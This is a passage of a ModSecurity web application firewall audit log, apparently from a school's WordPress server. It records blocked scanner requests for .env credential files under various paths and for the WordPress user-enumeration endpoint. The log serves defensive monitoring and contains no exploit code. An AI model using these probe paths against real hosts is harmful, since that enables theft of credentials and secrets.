[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748877040196254 3133 (- - -) Stopwatch2: 1748877040196254 3133; combined=1483, p1=512, p2=942, p3=0, p4=0, p5=29, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf73370d-Z-- --d90a8c18-A-- [02/Jun/2025:22:27:31 +0700] aD3C4-6eDjh4wF4csdukuQAAAI4 103.236.140.4 47000 103.236.140.4 8181 --d90a8c18-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.212.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.212.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --d90a8c18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d90a8c18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748878051667367 791 (- - -) Stopwatch2: 1748878051667367 791; combined=373, p1=334, p2=0, p3=0, p4=0, p5=39, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d90a8c18-Z-- --a645246a-A-- [02/Jun/2025:22:28:21 +0700] aD3DFX8VMK8tZef_-m8EOQAAAEw 103.236.140.4 50114 103.236.140.4 8181 --a645246a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.235.255.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.235.255.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a645246a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a645246a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748878101655712 2219 (- - -) Stopwatch2: 1748878101655712 2219; combined=882, p1=287, p2=573, p3=0, p4=0, p5=22, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a645246a-Z-- --5ae2bd59-A-- [02/Jun/2025:22:28:40 +0700] aD3DKO6eDjh4wF4csduleAAAAJU 103.236.140.4 51326 103.236.140.4 8181 --5ae2bd59-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.212.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.212.94 X-Forwarded-Proto: https Connection: close User-Agent: HTMLParser/1.6 Accept-Charset: utf-8 --5ae2bd59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ae2bd59-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748878120691966 626 (- - -) Stopwatch2: 1748878120691966 626; combined=215, p1=190, p2=0, p3=0, p4=0, p5=25, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ae2bd59-Z-- --6b80d61d-A-- [02/Jun/2025:22:44:23 +0700] aD3G10A6be0-boUGPH23RwAAANc 103.236.140.4 53646 103.236.140.4 8181 --6b80d61d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 114.9.16.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 114.9.16.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6b80d61d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b80d61d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748879063340512 3110 (- - -) Stopwatch2: 1748879063340512 3110; combined=1340, p1=418, p2=888, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b80d61d-Z-- --71cf946f-A-- [02/Jun/2025:22:45:43 +0700] aD3HJ0A6be0-boUGPH23TwAAAMo 103.236.140.4 53692 103.236.140.4 8181 --71cf946f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 120.78.123.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 120.78.123.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --71cf946f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71cf946f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748879143704855 3022 (- - -) Stopwatch2: 1748879143704855 3022; combined=1347, p1=486, p2=825, p3=0, p4=0, p5=36, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71cf946f-Z-- --b160f86c-A-- [02/Jun/2025:22:56:02 +0700] aD3JktG4Cudp_oIcbnPn4gAAAAA 103.236.140.4 53958 103.236.140.4 8181 --b160f86c-B-- GET /.env.backup HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3872.0 Safari/537.36 Edg/78.0.244.0 Accept-Charset: utf-8 --b160f86c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b160f86c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748879762610566 678 (- - -) Stopwatch2: 1748879762610566 678; combined=278, p1=237, p2=0, p3=0, p4=0, p5=40, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b160f86c-Z-- --39436203-A-- [02/Jun/2025:23:15:23 +0700] aD3OG38VMK8tZef_-m8MOwAAAFY 103.236.140.4 54746 103.236.140.4 8181 --39436203-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.20.83.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.20.83.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --39436203-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39436203-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748880923782631 2862 (- - -) Stopwatch2: 1748880923782631 2862; combined=1280, p1=416, p2=835, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39436203-Z-- --29791a62-A-- [02/Jun/2025:23:25:42 +0700] aD3Qhn8VMK8tZef_-m8MdgAAAEU 103.236.140.4 55016 103.236.140.4 8181 --29791a62-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Mi Note 3 Build/OPM1.171019.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044813 Mobile Safari/537.36 MMWEBID/6858 MicroMessenger/7.0.5.1440(0x27000537) Process/tools NetType/4G Language/zh_CN Accept-Charset: utf-8 --29791a62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29791a62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748881542713509 892 (- - -) Stopwatch2: 1748881542713509 892; combined=373, p1=332, p2=0, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29791a62-Z-- --9eec7738-A-- [02/Jun/2025:23:52:20 +0700] aD3WxO6eDjh4wF4csdutDAAAAJc 103.236.140.4 56472 103.236.140.4 8181 --9eec7738-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 209.38.28.124 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 209.38.28.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9eec7738-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9eec7738-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748883140820639 882 (- - -) Stopwatch2: 1748883140820639 882; combined=398, p1=342, p2=0, p3=0, p4=0, p5=55, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9eec7738-Z-- --10831061-A-- [02/Jun/2025:23:57:57 +0700] aD3YFUA6be0-boUGPH24RwAAAMg 103.236.140.4 56626 103.236.140.4 8181 --10831061-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.49 Safari/537.36 Accept-Charset: utf-8 --10831061-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10831061-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748883477647389 981 (- - -) Stopwatch2: 1748883477647389 981; combined=408, p1=364, p2=0, p3=0, p4=0, p5=43, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10831061-Z-- --990b6314-A-- [03/Jun/2025:00:04:08 +0700] aD3ZiEA6be0-boUGPH24fQAAAMs 103.236.140.4 57330 103.236.140.4 8181 --990b6314-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.202.250.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.202.250.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --990b6314-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --990b6314-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748883848768075 33359 (- - -) Stopwatch2: 1748883848768075 33359; combined=60791, p1=497, p2=970, p3=0, p4=0, p5=29681, sr=80, sw=0, l=0, gc=29643 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --990b6314-Z-- --33d6111e-A-- [03/Jun/2025:00:16:09 +0700] aD3cWUA6be0-boUGPH240QAAAMM 103.236.140.4 57782 103.236.140.4 8181 --33d6111e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --33d6111e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33d6111e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884569885803 677 (- - -) Stopwatch2: 1748884569885803 677; combined=254, p1=220, p2=0, p3=0, p4=0, p5=33, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33d6111e-Z-- --77a6bb67-A-- [03/Jun/2025:00:16:10 +0700] aD3cWn8VMK8tZef_-m8OBwAAAEU 103.236.140.4 57784 103.236.140.4 8181 --77a6bb67-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --77a6bb67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77a6bb67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884570066373 649 (- - -) Stopwatch2: 1748884570066373 649; combined=241, p1=214, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77a6bb67-Z-- --69f2af40-A-- [03/Jun/2025:00:16:10 +0700] aD3cWn8VMK8tZef_-m8OCAAAAEc 103.236.140.4 57786 103.236.140.4 8181 --69f2af40-B-- GET /app/config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --69f2af40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69f2af40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884570247160 673 (- - -) Stopwatch2: 1748884570247160 673; combined=276, p1=244, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69f2af40-Z-- --eefdca50-A-- [03/Jun/2025:00:16:10 +0700] aD3cWkA6be0-boUGPH240gAAAMQ 103.236.140.4 57788 103.236.140.4 8181 --eefdca50-B-- GET /staging/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --eefdca50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eefdca50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884570427916 654 (- - -) Stopwatch2: 1748884570427916 654; combined=252, p1=221, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eefdca50-Z-- --bdc0a91a-A-- [03/Jun/2025:00:16:10 +0700] aD3cWn8VMK8tZef_-m8OCQAAAFQ 103.236.140.4 57790 103.236.140.4 8181 --bdc0a91a-B-- GET /admin-app/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --bdc0a91a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bdc0a91a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884570608659 680 (- - -) Stopwatch2: 1748884570608659 680; combined=263, p1=224, p2=0, p3=0, p4=0, p5=39, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdc0a91a-Z-- --69067745-A-- [03/Jun/2025:00:16:10 +0700] aD3cWn8VMK8tZef_-m8OCgAAAE0 103.236.140.4 57792 103.236.140.4 8181 --69067745-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --69067745-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69067745-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884570789453 641 (- - -) Stopwatch2: 1748884570789453 641; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69067745-Z-- --e74db529-A-- [03/Jun/2025:00:16:10 +0700] aD3cWkA6be0-boUGPH240wAAANQ 103.236.140.4 57794 103.236.140.4 8181 --e74db529-B-- GET /app/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --e74db529-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e74db529-H-- Message: Access denied with code 403 (phase 1). Matched 